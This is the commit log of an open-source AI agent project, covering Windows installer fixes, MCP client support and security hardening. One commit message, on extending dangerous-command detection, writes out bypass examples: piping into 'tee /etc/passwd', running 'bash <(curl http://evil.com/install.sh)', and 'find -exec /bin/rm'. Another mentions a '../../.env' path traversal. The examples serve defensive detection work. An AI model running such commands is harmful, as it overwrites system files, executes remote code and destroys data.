aefc330b8f merge: resolve conflict with main (add mcp + homeassistant extras) 2026-03-03 14:52:22 +03:00
0xbyt4
f967471758 merge: resolve conflict with main (keep fence markers + _find_shell) 2026-03-03 14:50:45 +03:00
teknium1
4f5ffb8909 fix: NoneType not iterable error when summarizing at max iterations
In _handle_max_iterations, the codex_responses path set tools=None to
prevent tool calls during summarization. However, the OpenAI SDK's
_make_tools() treats None as a valid value (not its Omit sentinel) and
tries to iterate over it, causing TypeError: 'NoneType' object is not
iterable.

Fix: use codex_kwargs.pop('tools', None) to remove the key entirely,
so the SDK never receives it and uses its default omit behavior.

Fixes #300
2026-03-03 03:42:44 -08:00
mehmetkr-31
54909b0282 fix(setup): improve shell config detection for PATH setup 2026-03-03 14:39:46 +03:00
teknium1
f084538cb9 Move vision items to GitHub issues (#314, #315)
Voice Mode → #314
Dogfood Skill → #315

The VISION.md doc is removed in favor of detailed, trackable GitHub
issues. Issues are assignable, discussable, and linkable to PRs.
2026-03-03 01:26:05 -08:00
teknium1
535b46f813 feat: ZIP-based update fallback for Windows
On Windows systems where git can't write files (antivirus, NTFS filter
drivers), 'hermes update' now falls back to downloading a ZIP archive
from GitHub and extracting it over the existing installation.

The fallback triggers in two cases:
1. No .git directory (ZIP-installed via install.ps1 fallback)
2. Git pull fails with CalledProcessError on Windows

The ZIP update preserves venv/, node_modules/, .git/, and .env,
reinstalls Python deps via uv, and syncs bundled skills.

Also adds -c windows.appendAtomically=false to all git commands in
the update path for systems where git works but atomic writes fail.
2026-03-02 23:00:22 -08:00
teknium1
4766b3cdb9 fix: fall back to ZIP download when git clone fails on Windows
Git for Windows can completely fail to write files during clone due to
antivirus software, Windows Defender Controlled Folder Access, or NTFS
filter drivers. Even with windows.appendAtomically=false, the checkout
phase fails with 'unable to create file: Invalid argument'.

New install strategy (3 attempts):
1. git clone with -c windows.appendAtomically=false (SSH then HTTPS)
2. If clone fails: download GitHub ZIP archive, extract with
   Expand-Archive (Windows native, no git file I/O), then git init
   the result for future updates
3. All git commands now use -c flag to inject the atomic write fix

Also passes -c flag on update path (fetch/checkout/pull) and makes
submodule init failure non-fatal with a warning.
2026-03-02 22:53:28 -08:00
teknium1
354af6ccee chore: remove unnecessary migration code from install.ps1
No existing Windows installations to migrate from.
2026-03-02 22:51:36 -08:00
teknium1
c9afbbac0b feat: install to %LOCALAPPDATA%\hermes on Windows
Move Windows install location from ~\.hermes (user profile root) to
%LOCALAPPDATA%\hermes (C:\Users\<user>\AppData\Local\hermes).

The user profile directory is prone to issues from OneDrive sync,
Windows Defender Controlled Folder Access, and NTFS filter drivers
that break git's atomic file operations. %LOCALAPPDATA% is the
standard Windows location for per-user app data (used by VS Code,
Discord, etc.) and avoids these issues.

Changes:
- Default HermesHome to $env:LOCALAPPDATA\hermes
- Set HERMES_HOME user env var so Python code finds the new location
- Auto-migrate existing ~\.hermes installations on first run
- Update completion message to show actual paths
2026-03-02 22:49:22 -08:00
teknium1
83fa442c1b fix: use env vars for git windows.appendAtomically on Windows
The previous fix set git config --global before clone, but on systems
where atomic writes are broken (OneDrive, antivirus, NTFS filter
drivers), even writing ~/.gitconfig fails with 'Invalid argument'.

Fix: inject the config via GIT_CONFIG_COUNT/KEY/VALUE environment
variables, which git reads before performing any file I/O. This
bypasses the chicken-and-egg problem where git can't write the config
file that would fix its file-writing issue.
2026-03-02 22:47:04 -08:00
teknium1
1900e5238b fix: git clone fails on Windows with 'copy-fd: Invalid argument'
Git for Windows can fail during clone when copying hook template files
from the system templates directory. The error:

  fatal: cannot copy '.../templates/hooks/fsmonitor-watchman.sample'
         to '.git/hooks/...': Invalid argument

The script already set windows.appendAtomically=false but only AFTER
clone, which is too late since clone itself triggers the error.

Fix:
- Set git config --global windows.appendAtomically false BEFORE clone
- Add a third fallback: clone with --template='' to skip hook template
  copying entirely (they're optional .sample files)
2026-03-02 22:39:57 -08:00
teknium1
ddae1aa2e9 fix: install.ps1 exits entire PowerShell window when run via iex
When running via 'irm ... | iex', the script executes in the caller's
session scope. The 'exit 1' calls (lines 424, 460, 849-851) would kill
the entire PowerShell window instead of just stopping the script.

Fix:
- Replace all 'exit 1' with 'throw' for proper error propagation
- Wrap Main() call in try/catch so errors are caught and displayed
  with a helpful message instead of silently closing the terminal
- Show fallback instructions to download and run as a .ps1 file
  if the piped install keeps failing
2026-03-02 22:38:31 -08:00
teknium1
16274d5a82 fix: Windows git 'unable to write loose object' + venv pip path
- Set 'git config windows.appendAtomically false' in hermes update
  command (win32 only) and in install.ps1 after cloning. Fixes the
  'fatal: unable to write loose object file: Invalid argument' error
  on Windows filesystems.
- Fix venv pip fallback path: Scripts/pip on Windows vs bin/pip on Unix
- Gate .env encoding fix behind _IS_WINDOWS (no change to Linux/macOS)
2026-03-02 22:31:42 -08:00
teknium1
5749f5809c fix: explicit UTF-8 encoding for .env file operations (Windows only)
On Windows, open() without explicit encoding uses the system locale
(cp1252/etc.), which can cause OSError errno 22 'Invalid argument'
when reading/writing the UTF-8 .env file.

Fix: gate encoding kwargs behind _IS_WINDOWS check so Linux/macOS
code paths are completely unchanged. Only Windows gets explicit
encoding='utf-8' on load_env() and save_env_value().
2026-03-02 22:29:11 -08:00
BathreeNode
d10108f8ca fix: rename misspelled directory 'fouth-edition' to 'fourth-edition'
The ECMA schema directory was misspelled as 'fouth-edition'
instead of 'fourth-edition'. Renamed all 4 files within to
correct the path:

- opc-contentTypes.xsd
- opc-coreProperties.xsd
- opc-digSig.xsd
- opc-relationships.xsd
2026-03-03 09:21:28 +03:00
BathreeNode
8b520f9848 fix: rename misspelled directory 'fouth-edition' to 'fourth-edition'
The ECMA schema directory was misspelled as 'fouth-edition'
instead of 'fourth-edition'. Renamed all 4 files within to
correct the path:

- opc-contentTypes.xsd
- opc-coreProperties.xsd
- opc-digSig.xsd
- opc-relationships.xsd
2026-03-03 09:20:47 +03:00
teknium1
4cc431afab fix: setup wizard skipping provider selection on fresh install
The is_existing check included 'get_config_path().exists()' which is
always True after installation (the installer copies config.yaml from
the template). This caused the wizard to enter quick mode, which
skips provider selection entirely — leaving hermes non-functional.

Fix: only consider it an existing installation when an actual
inference provider is configured (OPENROUTER_API_KEY, OPENAI_BASE_URL,
or an active OAuth provider). Fresh installs now correctly show the
full setup flow with provider selection.
2026-03-02 22:20:45 -08:00
BathreeNode
a718aed1be fix: rename misspelled directory 'fouth-edition' to 'fourth-edition'
The ECMA schema directory was misspelled as 'fouth-edition'
instead of 'fourth-edition'. Renamed all 4 files within to
correct the path:

- opc-contentTypes.xsd
- opc-coreProperties.xsd
- opc-digSig.xsd
- opc-relationships.xsd
2026-03-03 09:20:07 +03:00
BathreeNode
5f29e7b63c fix: rename misspelled directory 'fouth-edition' to 'fourth-edition'
The ECMA schema directory was misspelled as 'fouth-edition'
instead of 'fourth-edition'. Renamed all 4 files within to
correct the path:

- opc-contentTypes.xsd
- opc-coreProperties.xsd
- opc-digSig.xsd
- opc-relationships.xsd
2026-03-03 09:17:13 +03:00
teknium1
245c766512 fix: remove 2>&1 from git commands in PowerShell installer
Root cause: PowerShell with $ErrorActionPreference = 'Stop' only
creates NativeCommandError from stderr when you CAPTURE it via 2>&1.
Without the redirect, stderr flows directly to the console and
PowerShell never intercepts it.

This is how OpenClaw's install.ps1 handles it — bare git commands
with no stderr redirection. Wrap SSH clone attempt in try/catch
since it's expected to fail (falls back to HTTPS).
2026-03-02 22:14:18 -08:00
BathreeNode
f08ad94d4d fix: correct typo 'Grup' -> 'Group' in test section headers
Three section header comments in tests/test_run_agent.py used
'Grup' instead of 'Group':

- Line 124: # Grup 1: Pure Functions
- Line 276: # Grup 2: State / Structure Methods
- Line 572: # Grup 3: Conversation Loop Pieces (OpenAI mock)
2026-03-03 09:10:35 +03:00
teknium1
cdf5375b9a fix: PowerShell NativeCommandError on git stderr output
PowerShell with $ErrorActionPreference = 'Stop' treats ANY stderr
output from native commands as a terminating NativeCommandError —
even successful git operations that write progress to stderr
(e.g. 'Cloning into ...').

Fix: temporarily set $ErrorActionPreference = 'Continue' around all
git commands (clone, fetch, checkout, pull, submodule update). This
lets git run normally while preserving strict error handling for
the rest of the installer.
2026-03-02 22:10:31 -08:00
teknium1
bdf4758510 fix: show uv error on Python install failure, add fallback detection
The Windows installer was swallowing uv python install errors with
| Out-Null, making failures impossible to diagnose. Now:

- Shows the actual uv error output when installation fails
- Falls back to finding any existing Python 3.10-3.13 on the system
- Falls back to system python if available
- Shows helpful manual install instructions (python.org URL + winget)
2026-03-02 22:06:26 -08:00
teknium1
84e45b5c40 feat: tabbed platform installer on landing page
Add an interactive OS selector widget to the hero section and install
steps, inspired by OpenClaw's install UI:

- macOS-style window chrome with red/yellow/green dots
- Three clickable tabs: Linux/macOS, PowerShell, CMD
- Command text, shell prompt, and note update on tab click
- Auto-detects visitor's OS and selects the right tab on page load
- Install steps section also gets synced platform tabs
- Simplified Windows note section (tabs above now cover all platforms)
- Fully responsive — icons hidden on mobile, tabs wrap properly
2026-03-02 22:03:43 -08:00
teknium1
daedec6957 fix: Telegram adapter crash on Windows when library not installed (#304)
The ImportError fallback set ContextTypes = Any, but then
ContextTypes.DEFAULT_TYPE was used as a type annotation at class
definition time — Any doesn't have .DEFAULT_TYPE, causing AttributeError.

Fix: create a _MockContextTypes class with DEFAULT_TYPE = Any.
Also stub CommandHandler, TelegramMessageHandler, filters, ParseMode,
and ChatType to prevent potential NameErrors.

Fixes #304.
2026-03-02 22:03:36 -08:00
teknium1
de59d91add feat: Windows native support via Git Bash
- Add scripts/install.cmd batch wrapper for CMD users (delegates to install.ps1)
- Add _find_shell() in local.py: detects Git Bash on Windows via
  HERMES_GIT_BASH_PATH env var, shutil.which, or common install paths
  (same pattern as Claude Code's CLAUDE_CODE_GIT_BASH_PATH)
- Use _find_shell() in process_registry.py for background processes
- Fix hermes_cli/gateway.py: use wmic instead of ps aux on Windows,
  skip SIGKILL (doesn't exist on Windows), fix venv path
  (Scripts/python.exe vs bin/python)
- Update README with three install commands (Linux/macOS, PowerShell, CMD)
  and Windows native documentation

Requires Git for Windows, which bundles bash.exe. The terminal tool
transparently uses Git Bash for shell commands regardless of whether
the user launched hermes from PowerShell or CMD.
2026-03-02 22:03:29 -08:00
Teknium
68cc81a74d Merge pull request #301 from NousResearch/feat/mcp-support
feat(mcp): Native MCP client with HTTP transport, reconnection, and security
2026-03-02 21:32:43 -08:00
teknium1
3ead3401e0 fix(mcp): persist updated tools to session log immediately after reload
After /reload-mcp updates self.agent.tools, immediately call
_persist_session() so the session JSON file at ~/.hermes/sessions/
reflects the new tools list. Without this, the tools field in the
session log would only update on the next conversation turn — if
the user quit after reloading, the log would have stale tools.
2026-03-02 21:31:23 -08:00
teknium1
eec31b0089 fix(mcp): /reload-mcp now updates agent tools + injects history message
- CLI: After reload, refreshes self.agent.tools and valid_tool_names
  so the model sees updated tools on its next API call
- Both CLI and Gateway: Appends a [SYSTEM: ...] message at the END
  of conversation history explaining what changed (added/removed/
  reconnected servers, tool count). This preserves prompt-cache for
  the system prompt and earlier messages — only the tail changes.
- Gateway already creates a new AIAgent per message so tools refresh
  naturally; the injected message provides context for the model
2026-03-02 19:25:06 -08:00
teknium1
7df14227a9 feat(mcp): banner integration, /reload-mcp command, resources & prompts
Banner integration:
- MCP Servers section in CLI startup banner between Tools and Skills
- Shows each server with transport type, tool count, connection status
- Failed servers shown in red; section hidden when no MCP configured
- Summary line includes MCP server count
- Removed raw print() calls from discovery (banner handles display)

/reload-mcp command:
- New slash command in both CLI and gateway
- Disconnects all MCP servers, re-reads config.yaml, reconnects
- Reports what changed (added/removed/reconnected servers)
- Allows adding/removing MCP servers without restarting

Resources & Prompts support:
- 4 utility tools registered per server: list_resources, read_resource,
  list_prompts, get_prompt
- Exposes MCP Resources (data sources) and Prompts (templates) as tools
- Proper parameter schemas (uri for read_resource, name for get_prompt)
- Handles text and binary resource content
- 23 new tests covering schemas, handlers, and registration

Test coverage: 74 MCP tests total, 1186 tests pass overall.
2026-03-02 19:15:59 -08:00
teknium1
60effcfc44 fix(mcp): parallel discovery, user-visible logging, config validation
- Discovery is now parallel (asyncio.gather) instead of sequential,
  fixing the 60s shared timeout issue with multiple servers
- Startup messages use print() so users see connection status even
  with default log levels (the 'tools' logger is set to ERROR)
- Summary line shows total tools and failed servers count
- Validate conflicting config: warn if both 'url' and 'command' are
  present (HTTP takes precedence)
- Update TODO.md: mark MCP as implemented, list remaining work
- Add test for conflicting config detection (51 tests total)

All 1163 tests pass.
2026-03-02 19:02:28 -08:00
teknium1
63f5e14c69 docs: add comprehensive MCP documentation and examples
- docs/mcp.md: Full MCP documentation covering prerequisites, configuration,
  transports (stdio + HTTP), security (env filtering, credential stripping),
  reconnection, troubleshooting, popular servers, and advanced usage
- README.md: Add MCP section with quick config example and install instructions
- cli-config.yaml.example: Add commented mcp_servers section with examples
  for stdio, HTTP, and authenticated server configs
- docs/tools.md: Add MCP to Tool Categories table and MCP Tools section
- skills/mcp/native-mcp/SKILL.md: Create native MCP client skill with
  full configuration reference, transport types, security, troubleshooting
- skills/mcp/DESCRIPTION.md: Update category description to cover both
  native MCP client and mcporter bridge approaches
2026-03-02 18:52:33 -08:00
teknium1
64ff8f065b feat(mcp): add HTTP transport, reconnection, security hardening
Upgrades the MCP client implementation from PR #291 with:

- HTTP/Streamable HTTP transport: support 'url' key in config for remote
  MCP servers (Notion, Slack, Sentry, Supabase, etc.)
- Automatic reconnection with exponential backoff (1s-60s, 5 retries)
  when a server connection drops unexpectedly
- Environment variable filtering: only pass safe vars (PATH, HOME, etc.)
  plus user-specified env to stdio subprocesses (prevents secret leaks)
- Credential stripping: sanitize error messages before returning to the
  LLM (strips GitHub PATs, OpenAI keys, Bearer tokens, etc.)
- Configurable per-server timeouts: 'timeout' and 'connect_timeout' keys
- Fix shutdown race condition in servers_snapshot variable scoping

Test coverage: 50 tests (up from 30), including new tests for env
filtering, credential sanitization, HTTP config detection, reconnection
logic, and configurable timeouts.

All 1162 tests pass (1162 passed, 3 skipped, 0 failed).
2026-03-02 18:40:03 -08:00
teknium1
468b7fdbad Merge PR #291: feat: add MCP (Model Context Protocol) client support
Authored by 0xbyt4. Adds MCP client with official SDK, direct tool registration,
auto-injection into hermes-* toolsets, and graceful degradation.
2026-03-02 18:24:31 -08:00
teknium1
14b0ad95c6 docs: enhance WhatsApp setup instructions and introduce mode selection
Updated the README and messaging documentation to clarify the two modes for WhatsApp integration: 'bot' mode (recommended) and 'self-chat' mode. Improved setup instructions to guide users through the configuration process, including allowlist management and dependency installation. Adjusted CLI commands to reflect these changes and ensure a smoother user experience. Additionally, modified the WhatsApp bridge to support the new mode functionality.
2026-03-02 17:51:33 -08:00
teknium1
221e4228ec Merge PR #295: fix: resolve OPENROUTER_API_KEY before OPENAI_API_KEY in all code paths
Authored by 0xbyt4. Fixes #289.
2026-03-02 17:29:25 -08:00
teknium1
dd9d3f89b9 Merge PR #286: Fix ClawHub Skills Hub adapter for API endpoint changes
Authored by BP602. Fixes #285.
2026-03-02 17:25:14 -08:00
teknium1
b0cce17da6 Merge PR #284: fix(cli): throttle UI invalidate to prevent terminal blinking on SSH
Authored by ygd58. Fixes #282.
2026-03-02 17:17:54 -08:00
teknium1
c6b3b8c847 docs: add VISION.md brainstorming/roadmap doc
Initial vision board with voice mode feature exploration, CLI UX design,
gateway platform ideas, and open questions.
2026-03-02 17:15:30 -08:00
teknium1
2ba87a10b0 Merge PR #219: fix: guard POSIX-only process functions for Windows compatibility
Authored by Farukest. Fixes #218.
2026-03-02 17:07:49 -08:00
aydnOktay
5fa3e24b76 Make process_registry checkpoint writes atomic 2026-03-03 02:44:01 +03:00
aydnOktay
ac6d747fa6 Make batch_runner checkpoint incremental and atomic 2026-03-03 01:43:07 +03:00
alireza78a
ee541c84f1 fix(cron): close lock_fd on failed flock to prevent fd leak 2026-03-03 02:09:56 +03:30
0xbyt4
6053236158 fix: prioritize OPENROUTER_API_KEY over OPENAI_API_KEY
When both OPENROUTER_API_KEY and OPENAI_API_KEY are set (e.g. OPENAI_API_KEY
in .bashrc), the wrong key was sent to OpenRouter causing auth failures.

Fixed key resolution order in cli.py and runtime_provider.py.

Fixes #289
2026-03-03 00:28:26 +03:00
0xbyt4
11615014a4 fix: eliminate shell noise from terminal output with fence markers
- Wrap commands with unique fence markers (printf FENCE; cmd; printf FENCE)
  to isolate real output from shell init/exit noise (oh-my-zsh, macOS
  session restore/save, docker plugin errors, etc.)
- Expand _clean_shell_noise to cover zsh/macOS patterns and strip from
  both beginning and end (fallback when fences are missing)
- Fix BSD find compatibility: fallback to simple find when -printf
  produces empty output (macOS)
- Fix test_terminal_disk_usage: use sys.modules to get the real module
  instead of the shadowed function from tools/__init__.py
- Add 13 new unit tests for fence extraction and zsh noise patterns
2026-03-02 22:53:21 +03:00
Daniel Sateler
3588396263 feat(whatsapp): native media sending — images, videos, documents
Add a /send-media endpoint to the WhatsApp bridge and corresponding
adapter methods so the agent can send files as native WhatsApp
attachments instead of plain-text URLs/paths.

- bridge.js: new POST /send-media endpoint using Baileys' native
  image/video/document/audio message types with MIME detection
- base.py: add send_video(), send_document(), send_image_file()
  with text fallbacks; route MEDIA: tags by file extension instead
  of always treating them as voice messages
- whatsapp.py: implement all media methods via a shared
  _send_media_to_bridge() helper; override send_image() to download
  URLs to local cache and send as native photos
- prompt_builder.py: update WhatsApp and Telegram platform hints so
  the agent knows it can use MEDIA:/path tags to send native media
2026-03-02 16:34:49 -03:00
0xbyt4
11a2ecb936 fix: resolve thread safety issues and shutdown deadlock in MCP client
- Add threading.Lock protecting all shared state (_servers, _mcp_loop, _mcp_thread)
- Fix deadlock in shutdown_mcp_servers: _stop_mcp_loop was called inside
  a _lock block but also acquires _lock (non-reentrant)
- Fix race condition in _ensure_mcp_loop with concurrent callers
- Change idempotency to per-server (retry failed servers, skip connected)
- Dynamic toolset injection via startswith("hermes-") instead of hardcoded list
- Parallel shutdown via asyncio.gather instead of sequential loop
- Add tests for partial failure retry, parallel shutdown, dynamic injection
2026-03-02 22:08:32 +03:00
0xbyt4
151e8d896c fix(tests): isolate discover_mcp_tools tests from global _servers state
Patch _servers to empty dict in tests that call discover_mcp_tools()
with mocked config, preventing interference from real MCP connections
that may exist when running within the full test suite.
2026-03-02 21:38:01 +03:00
0xbyt4
593c549bc4 fix: make discover_mcp_tools idempotent to prevent duplicate connections
When discover_mcp_tools() is called multiple times (e.g. direct call
then model_tools import), return existing tool names instead of opening
new connections that would orphan the previous ones.
2026-03-02 21:34:21 +03:00
0xbyt4
aa2ecaef29 fix: resolve orphan subprocess leak on MCP server shutdown
Refactor MCP connections from AsyncExitStack to task-per-server
architecture. Each server now runs as a long-lived asyncio Task
with `async with stdio_client(...)`, ensuring anyio cancel-scope
cleanup happens in the same Task that opened the connection.
2026-03-02 21:22:00 +03:00
0xbyt4
0eb0bec74c feat(gateway): add MCP server shutdown on gateway exit
Ensures MCP subprocess connections are closed when the messaging
gateway shuts down, preventing orphan processes.
2026-03-02 21:06:17 +03:00
0xbyt4
3c252ae44b feat: add MCP (Model Context Protocol) client support
Connect to external MCP servers via stdio transport, discover their tools
at startup, and register them into the hermes-agent tool registry.

- New tools/mcp_tool.py: config loading, server connection via background
  event loop, tool handler factories, discovery, and graceful shutdown
- model_tools.py: trigger MCP discovery after built-in tool imports
- cli.py: call shutdown_mcp_servers in _run_cleanup
- pyproject.toml: add mcp>=1.2.0 as optional dependency
- 27 unit tests covering config, schema conversion, handlers, registration,
  SDK interaction, toolset injection, graceful fallback, and shutdown

Config format (in ~/.hermes/config.yaml):
  mcp_servers:
    filesystem:
      command: "npx"
      args: ["-y", "@modelcontextprotocol/server-filesystem", "/tmp"]
2026-03-02 21:03:14 +03:00
BP602
6789084ec0 Fix ClawHub Skills Hub adapter for updated API 2026-03-02 16:11:49 +01:00
ygd58
b603b6e1c9 fix(cli): throttle UI invalidate to prevent terminal blinking on SSH 2026-03-02 16:00:12 +01:00
teknium1
3c13feed4c feat: show detailed tool call args in gateway based on config
Issue #263: Telegram/Discord/WhatsApp/Slack now show tool call details
based on display.tool_progress in config.yaml.

Changes:
- gateway/run.py: 'verbose' mode shows full args (keys + JSON, 200 char
  max). 'all' mode preview increased from 40 to 80 chars. Added missing
  tool emojis (execute_code, delegate_task, clarify, skill_manage,
  search_files).
- agent/display.py: Added execute_code, delegate_task, clarify,
  skill_manage to primary_args. Added 'code' and 'goal' to fallback keys.
- run_agent.py: Pass function_args dict to tool_progress_callback so
  gateway can format based on its own verbosity config.

Config usage:
  display:
    tool_progress: verbose  # off | new | all | verbose
2026-03-02 05:23:15 -08:00
teknium1
7652afb8de Merge PR #243: fix(honcho): auto-enable when API key is present
Authored by Bartok9. Fixes #241.
2026-03-02 05:13:33 -08:00
teknium1
7862e7010c test: add additional multiline bypass tests for find patterns
Extra test coverage for newline bypass detection (DOTALL fix).
Inspired by Bartok9's PR #245.
2026-03-02 04:46:27 -08:00
teknium1
4faf2a6cf4 Merge PR #233: fix(security): add re.DOTALL to prevent multiline bypass of dangerous command detection
Authored by Farukest. Fixes #232.
2026-03-02 04:44:06 -08:00
teknium1
8c48bb080f refactor: remove unnecessary single-element loop in disk usage calc
The 'for pattern in [f"hermes-*{task_id[:8]}*"]' was a loop over a
single-element list — just use a plain variable instead.
2026-03-02 04:40:13 -08:00
teknium1
6d2481ee5c Merge PR #231: fix: use task-specific glob pattern in disk usage calculation
Authored by Farukest. Fixes #230.
2026-03-02 04:38:58 -08:00
teknium1
ca5525bcd7 fix(tests): isolate HERMES_HOME in tests and adjust log directory for debug session
Added a fixture to redirect HERMES_HOME to a temporary directory during tests, preventing writes to the user's home directory. Updated the test for DebugSession to create a dedicated log directory for saving logs, ensuring test isolation and accuracy in assertions.
2026-03-02 04:34:21 -08:00
teknium1
56b53bff6e Merge PR #229: fix(agent): copy conversation_history to avoid mutating caller's list
Authored by Farukest. Fixes #228.

# Conflicts:
#	tests/test_run_agent.py
2026-03-02 04:21:39 -08:00
Dogila Developer
fd335a4e26 fix: add missing dangerous command patterns in approval.py
Three attack vectors bypassed the dangerous command detection system:

1. tee writes to sensitive paths (/etc/, /dev/sd, .ssh/, .hermes/.env)
were not detected. tee writes to files just like > but was absent
from DANGEROUS_PATTERNS.
Example: echo 'evil' | tee /etc/passwd

2. curl/wget via process substitution bypassed the pipe-to-shell check.
The existing pattern only matched curl ... | bash but not
bash <(curl ...) which is equally dangerous.
Example: bash <(curl http://evil.com/install.sh)

3. find -exec with full-path rm (e.g. /bin/rm, /usr/bin/rm) was not
caught. The pattern only matched bare rm, not absolute paths.
Example: find . -exec /bin/rm {} \;
2026-03-02 14:46:20 +03:00
teknium1
c4ea996612 fix: repair flush sentinel test — mock auxiliary client and add guard
The TestFlushSentinelNotLeaked test from PR #227 had two issues:
1. flush_memories() uses get_text_auxiliary_client() which could bypass
   agent.client entirely — mock it to return (None, None)
2. No assertion that the API was actually called — added guard assert

Without these fixes the test passed vacuously (API never called).
2026-03-02 03:21:08 -08:00
teknium1
39bfd226b8 Merge PR #225: fix: preserve empty content in ReadResult.to_dict()
Authored by Farukest. Fixes #224.
2026-03-02 03:13:31 -08:00
teknium1
234b67f5fd fix: mock time in retry exhaustion tests to prevent backoff sleep
The TestRetryExhaustion tests from PR #223 didn't mock time.sleep/time.time,
causing the retry backoff loops (275s+ total) to run in real time. Tests would
time out instead of running quickly.

Added _make_fast_time_mock() helper that creates a mock time module where
time.time() advances 500s per call (so sleep_end is always in the past) and
time.sleep() is a no-op. Both tests now complete in <1s.
2026-03-02 02:59:41 -08:00
teknium1
e27e3a4f8a Merge PR #223: fix: correct off-by-one in retry exhaustion checks
Authored by Farukest. Fixes #222.
2026-03-02 02:54:10 -08:00
teknium1
7a11ff95a9 Merge PR #277: fix: handle None message content across codebase
Fixes #276. Replace msg.get('content', '') with msg.get('content') or ''
in 4 vulnerable message-processing paths.
2026-03-02 02:42:35 -08:00
teknium1
33ab5cec82 fix: handle None message content across codebase (fixes #276)
The OpenAI API returns content: null on assistant messages with tool
calls. msg.get('content', '') returns None when the key exists with
value None, causing TypeError on len(), string concatenation, and
.strip() in downstream code paths.

Fixed 4 locations that process conversation messages:
- agent/auxiliary_client.py:84 — None passed to API calls
- cli.py:1288 — crash on content[:200] and len(content)
- run_agent.py:3444 — crash on None.strip()
- honcho_integration/session.py:445 — 'None' rendered in transcript

13 other instances were verified safe (already protected, only process
user/tool messages, or use the safe pattern).

Pattern: msg.get('content', '') → msg.get('content') or ''

Fixes #276
2026-03-02 02:23:53 -08:00
teknium1
1cb2311bad fix(security): block path traversal in skill_view file_path (fixes #220)
skill_view accepted arbitrary file_path values like '../../.env' and
would read files outside the skill directory, exposing API keys and
other sensitive data.

Added two layers of defense:
1. Reject paths with '..' components (fast, catches obvious traversal)
2. resolve() containment check with trailing '/' to prevent prefix
   collisions (catches symlinks and edge cases)

Fix approach from PR #242 (@Bartok9). Vulnerability reported by
@Farukest (#220, PR #221). Tests rewritten to properly mock SKILLS_DIR.

Closes #220
2026-03-02 02:00:09 -08:00
teknium1
25c65bc99e fix(agent): handle None content in context compressor (fixes #211)
The OpenAI API returns content: null on assistant messages that only
contain tool calls. msg.get('content', '') returns None (not '') when
the key exists with value None, causing TypeError on len() and string
concatenation in _generate_summary and compress.

Fix: msg.get('content') or '' — handles both missing keys and None.

Tests from PR #216 (@Farukest). Fix also in PR #215 (@cutepawss).
Both PRs had stale branches and couldn't be merged directly.

Closes #211
2026-03-02 01:35:52 -08:00
teknium1
afb680b50d fix(cli): fix max_turns comment and test for correct priority order
Priority is: CLI arg > config file > env var > default
(not env var > config file as the old comment stated)

The test failed because config.yaml had max_turns at both root level
and inside agent section. The test cleared agent.max_turns but the
root-level value still took precedence over the env var. Fixed the
test to clear both, and corrected the comment to match the intended
priority order.
2026-03-02 01:18:52 -08:00
BathreeNode
c574a4d086 fix(batch_runner): log traceback when worker raises during imap_unordered
If any worker raises inside pool.imap_unordered(), the exception
propagates through the for loop and the results list is left
incomplete. The finally block correctly restores the log level but
the error is swallowed with no diagnostic information.

Added an explicit except block that logs the full traceback via
exc_info=True before re-raising, making batch worker failures
visible in logs without changing the existing control flow.
2026-03-02 12:16:07 +03:00
BathreeNode
bd8b20b933 Merge branch 'NousResearch:main' into main 2026-03-02 12:14:34 +03:00
teknium1
866fd9476b fix(docker): remove --read-only and allow exec on /tmp for package installs
The Docker sandbox previously used --read-only on the root filesystem and
noexec on /tmp. This broke 30+ skills that need to install packages:
- npm install -g (codex, claude-code, mcporter, powerpoint)
- pip install (20+ mlops/media/productivity skills)
- apt install (minecraft-modpack-server, ml-paper-writing)
- Build tools that compile in /tmp (pip wheels, node-gyp)

The container is already fully isolated from the host. Industry standard
(E2B, Docker Sandboxes, OpenAI Codex) does not use --read-only — the
container itself is the security boundary.

Retained security hardening:
- --cap-drop ALL (zero capabilities)
- --security-opt no-new-privileges (no escalation)
- --pids-limit 256 (no fork bombs)
- Size-limited tmpfs for /tmp, /var/tmp, /run
- nosuid on all tmpfs mounts
- noexec on /var/tmp and /run (rarely need exec there)
- Resource limits (CPU, memory, disk)
- Ephemeral containers (destroyed after use)

Fixes #189.
2026-03-02 01:09:34 -08:00
BathreeNode
d2ec5aaacf fix(registry): preserve full traceback on tool dispatch errors
logger.error() only records the exception message string, silently
discarding the stack trace. Switch to logger.exception() which
automatically appends the full traceback to the log output.

Without this change, when a tool handler raises an unexpected error
the log shows only the exception type and message, making it
impossible to determine which line caused the failure or trace
through nested calls.
2026-03-02 11:57:47 +03:00
teknium1
e265006fd6 test: add coverage for chat_topic in SessionSource and session context prompt
Tests added:
- Roundtrip serialization of chat_topic via to_dict/from_dict
- chat_topic defaults to None when missing from dict
- Channel Topic line appears in session context prompt when set
- Channel Topic line is omitted when chat_topic is None

Follow-up to PR #248 (feat: Discord channel topic in session context).
2026-03-02 00:53:21 -08:00
Josh Black-Star
b1bf11b0fe fix(setup): handle TerminalMenu init failures with safe fallback 2026-03-02 00:52:27 -08:00
teknium1
6bf3aad62e fix(delegate_tool): update max_iterations in documentation and example config to reflect default value of 50 2026-03-02 00:52:01 -08:00
teknium1
3a840a130c Merge PR #248: feat(gateway): include Discord channel topic in session context
Authored by Bartok9. Fixes #163.

Surfaces Discord channel topics in the agent's session context prompt,
allowing the agent to adapt its behavior based on the channel's purpose.
2026-03-02 00:51:20 -08:00
teknium1
14396e3fe7 fix(delegate_tool): update max_iterations default from 25 to 50 for improved task handling 2026-03-02 00:51:10 -08:00
teknium1
1ad930cbd0 fix(delegate_tool): increase DEFAULT_MAX_ITERATIONS from 25 to 50 to enhance processing capabilities 2026-03-02 00:51:01 -08:00
Sertug17
7a0b37712f fix(agent): strip finish_reason from assistant messages to fix Mistral 422 errors (#253)
* fix(agent): skip reasoning param for Mistral API to prevent 422 errors

* fix(agent): strip finish_reason from assistant messages to fix Mistral 422 errors
2026-03-02 00:35:03 -08:00
teknium1
e2b8740fcf fix: load_cli_config() now carries over non-default config keys
load_cli_config() only merged keys present in its hardcoded defaults
dict, silently dropping user-added keys like platform_toolsets (saved
by 'hermes tools'), provider_routing, memory, honcho, etc.

Added a second pass to carry over all file_config keys that aren't in
defaults, so 'hermes tools' changes actually take effect in CLI mode.

The gateway was unaffected (reads YAML directly via yaml.safe_load).
2026-03-02 00:32:28 -08:00
teknium1
45d132d098 fix(agent): remove preview truncation in assistant message output
Updated the AIAgent class to print the full content of assistant messages without truncation, enhancing visibility of the messages during runtime. This change improves the clarity of communication from the agent.
2026-03-02 00:32:06 -08:00
teknium1
719f2eef32 Merge branch 'pr-217'
# Conflicts:
#	gateway/session.py
2026-03-02 00:18:41 -08:00
teknium1
